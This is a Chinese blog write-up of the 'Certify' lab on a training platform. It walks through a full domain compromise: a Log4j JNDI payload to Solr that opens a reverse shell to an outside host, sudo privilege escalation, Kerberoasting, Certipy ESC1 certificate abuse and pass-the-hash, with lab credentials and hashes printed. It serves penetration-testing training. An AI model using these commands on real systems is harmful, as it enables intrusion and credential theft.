春秋云境Certify-WP【一遍过】

最新推荐文章于 2024-03-20 14:58:22 发布
最新推荐文章于 2024-03-20 14:58:22 发布
阅读量460 收藏 1
点赞数 2
分类专栏: 渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63576152/article/details/133799570
版权

flag01

fscan扫描

扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件

触发点是action参数

/solr/admin/collections?action=

验证:

http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://iszpua.dnslog.cn}

我是这样的,不知道为什么

其他人是这样的

证明存在log4j漏洞,利用JNDIExploit工具打

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vps -p 8888

监听端口

nc -lvnp 9999

访问网站

http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}

获得shell

提权

sudo -l

发现grc可以免密sudo执行,查看提权手册

sudo /usr/bin/grc --pty /bin/sh

获得权限

在/root/flag/flag01.txt获得flag01

flag02

先用wget上传frp和fscan

信息收集:

start infoscan
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.47     is alive
(icmp) Target 172.22.9.26     is alive
[*] Icmp alive hosts len is: 4
172.22.9.47:80 open
172.22.9.7:80 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.7:135 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.7:88 open
172.22.9.26:135 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.9.7
   [->]XIAORANG-DC
   [->]172.22.9.7
[*] WebTitle: http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] NetBios: 172.22.9.7      [+]DC XIAORANG\XIAORANG-DC     
[*] 172.22.9.47  (Windows 6.1)
[*] NetInfo:
[*]172.22.9.26
   [->]DESKTOP-CBKTVMO
   [->]172.22.9.26
[*] WebTitle: http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetBios: 172.22.9.47     fileserver                          Windows 6.1 
[*] WebTitle: http://172.22.9.7         code:200 len:703    title:IIS Windows Server
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin
[+] http://172.22.9.7 poc-yaml-active-directory-certsrv-detect

总结出下面的拓扑

172.22.9.7  DC域控
172.22.9.13 CA域内机器
172.22.9.19 当前机器
172.22.9.26 域内机器
172.22.9.47 文件服务器

开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接

proxychains smbclient -L 172.22.9.47

查看共享文件

proxychains smbclient //172.22.9.47/fileshare

找到flag02.txt,直接get下来查看

flag03

把之前的数据库也get下来

打开查看,可以看到user表和member表

 

这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控和CA域不大可能,172.22.9.26这个域内机器是最有可能的)

导出数据,编为字典user.txt和pass.txt,爆破

proxychains hydra -L user.txt -P pass.txt 172.22.9.26 rdp

没有爆成功。。

看wp得到两个账号

XIAORANG.LAB\zhangjian–i9XDE02pLVf
XIAORANG.LAB\zhangjian–fiAzGwEMgTY

远程连接失败

根据flag02的提示,要用到spn

这里先尝试查找下域用户下的spn

proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

把凭证保存在hash.txt中,尝试hashcat破解
看了下hash类型(hashcat -h),符合13100

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

得到这样一个账户(另一个账户也是可以的)

XIAORANG.LAB\zhangxia
MyPass2@@6

再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处

这时重新看看内网还有那些机器
172.22.9.13 CA域成员机
存在一台证书颁发服务器
域渗透中和证书服务器相关的利用有ESC1和ESC8

先利用Certipy工具查看证书情况

proxychains certipy find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Property Principals       : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

虽然默认也有 ESC8, 但是因为 AD DS 和 AD CS 是在同一台机器上的, 所以无法进行 NTLM Relay

下面利用 ESC1

申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx

proxychains certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

利用administrator.pfx证书获取 TGT 和 NTLM Hash

proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7

NTLM:2f1b57eefb2d152196836b0516abea80

获得flag

proxychains  crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04

最后获得域控的flag04

proxychains crackmapexec smb 172.22.9.7 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

或者

proxychains impacket-wmiexec -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7

Jugg_xie
关注
专栏目录
certify-swiper4.rar
10-17
该轮播图一屏显示三张图片,中间图片放大,两边图片缩小效果。基于swiper的完美轮播图,提供给大家参考!效果图参考:https://blog.csdn.net/qq_20757489/article/details/101024851
春秋云镜-2022网鼎杯半决赛复盘-Writeup
qq_35607078的博客
08-14 1206
春秋云镜-2022网鼎杯半决赛复盘-Writeup
xray Web扫描器学习记录
weixin_50464560的博客
06-06 4179
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
春秋云境 Certify WP
m0_62466350的博客
01-18 1411
本文首发作者博客园Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
Active Directory 证书服务(一)
ZAWX_NETSTARSEC的博客
08-19 2565
Active Directory 证书服务(一) 0x00 前言 specterops发布了一篇关于Active Directory 证书服务相关漏洞的白皮书 https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf,关于Active Directory 证书服务的攻击第一次系统的进入我们的视野。 我在白皮书的基础上学习了Active Directory 证书服务相关的漏洞,作为学习成果,用两篇文章来介绍Active Directo
vulntarget-L(星期五实验室)
最新发布
ka_ka11的博客
03-20 1284
这个EXCHANGE$就是当前exchang机器的机器用户,而有这个用户的权限是用户组的WriteDACL权限,WriteDACL权限可以修改域对象的ACL,允许委托人修改受影响对象的DACL。我直接在exchange上添加一个网卡,直接进行反弹,后面再看看能不能通过goproxy代理,上线,模拟刚才我们获得system权限,我们进行提权。修改ip地址为自动,修改dns地址为114.114.114.114,修改完成应用,重新。修改tenda 端口转发的地址,修改为自己的出网的ip地址。
2022网鼎杯半决赛复盘
龙狼刺的博客
07-12 1863
该靶场为2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4个flag,分布于不同的靶机。
certify-aws-issuer:验证更新的AWS发行者
03-28
验证AWS更新的Issuer 旨在与github.com/aws/aws-sdk-go-v2最新版本一起使用,而github.com/aws/aws-sdk-go-v2中的aws实现不支持该github.com/johanbrandhorst/certify 。如何使用它与默认库相同:)
SYNPLICITY的CERTIFY软件全面支持XILINX VIRTEX-5 FPGA
12-02
SYNPLICITY的Certify软件是一款专为ASIC RTL原型设计打造的工具,它全面支持Xilinx Virtex-5系列的65纳米FPGA。这一增强意味着设计者现在能够利用Virtex-5 FPGA的高性能、高容量和灵活性来构建ASIC原型,而不再局限...
certifyme-backend:certify-me POC的后端应用程序
05-10
press ctrl + c to exist this command npm run monitor这将打开一个窗口,您可以在其中监视应用程序, press ctrl + c to exist this command npm run list它将列出您正在运行的应用程序确保配置了环境变量参考...
certify-prototype-jasonhead:这是我使用 Jekyll 的 Certify Prototype 版本
08-05
验证原型 这是使用构建的 SBA 的静态原型。 有关完整文档,请访问。 跑步 bundle install bundle exec jekyll s 导航 ...部署 bundle exec cds-gh-pages ...使用 Jekyll 的data功能,使用Front Matter组合一个
靶场练习--春秋云境-Certify
NoooEmotion的博客
01-28 1849
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
春秋云镜-【仿真场景】Certify writeup
渗透测试研究中心
03-07 1201
说明Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Solr、AD CS、SMB、Kerberos、域渗透第一个flaglog4j RCE扫描外网IP发现solr存在log4j的组件,测试...
春秋云境2022网鼎杯半决赛-WP一遍过】
weixin_63576152的博客
10-17 603
注意,这里的certipy不是出现命令不存在kali让你下载的那个,这个是个打CVE-2022–26923的工具:https://github.com/ly4k/Certipy/打开http://172.22.15.24/phpmyadmin用账号和密码登了一下,发现有个表有一堆域账户。(脚本链接:https://github.com/AlmondOffSec/PassTheCert/)wordpress,打开http://39.99.137.31/wp-admin。原来是**校园网,后来换热点就可以了。
【内网渗透】春秋云镜Intitle WP
Sapphire037的博客
04-23 2278
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
安装 Active Directory 证书服务的时候没有Certsrv
weixin_30537391的博客
09-17 1108
在Windows Server 的时候一直没有Certsrv这个目录。 需要检查一下在IIS中网站的ID顺序。 默认使用ID为1的。 转载于:https://www.cnblogs.com/qiumc/p/11533643.html
春秋云境Tsclient-WP一遍过】
weixin_63576152的博客
10-05 324
quser查看计算机上的用户会话信息(quser命令在windows server和windows的某些专业版才适用)上传mimikatz,用shift后门启动管理员权限的cmd,运行mimikatz,执行命令。服务器管理器-->管理-->添加角色1 和功能-->功能-->勾选.net3.5进行安装。里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)运行完会跳出一个命令框,直接通过命令行可以访问域控的文件。查看权限,当前用户是普通用户,没有管理员权限。或者用下面的命令添加用户test,远程登录。
春秋云镜靶场记录
wanan的博客
01-19 466
春秋云镜靶场记录
活动目录(Active Directory安全审计
ITmoster的博客
04-26 693
ADAudit Plus 可以清楚地显示 AD 资源所做的所有更改,包括 AD 对象、属性、组策略等。AD 审计有助于检测和响应内部威胁、特权滥用和其他妥协指标,简而言之,可以增强组织的安全性。
certify-swiper7.zip
09-17
Certify-swiper7.zip是一个可能是一个压缩文件的命名。根据名称中的"certify",可以推测这个文件可能与认证有关。同时,"swiper7"这个词可能与一些滑块(slider)的功能或版本有关。 根据文件的后缀为.zip,可以推断出这是一个压缩文件。压缩文件经常用于打包和压缩多个文件或文件夹,以减少文件的大小,并将其用于传输或存储目的。在这种情况下,certify-swiper7.zip可能包含一些认证相关的文件或文件夹。 为了详细了解certify-swiper7.zip的内容,需要解压缩这个文件。可以使用解压缩软件(如WinRAR、7-Zip等)来打开并解压这个文件。解压缩后,我们可以查看文件和文件夹的结构,以了解其内容。 解压缩后,我们可以进一步查看certify-swiper7.zip的内容。如果这个压缩文件确实与认证有关,其中可能包含认证证书、授权文件、代码库或认证相关的文档。这些文件可以帮助用户了解如何认证某个产品、服务或系统。 综上所述,certify-swiper7.zip可能是一个包含认证相关文件的压缩文件。为了详细了解其内容,需要解压缩这个文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值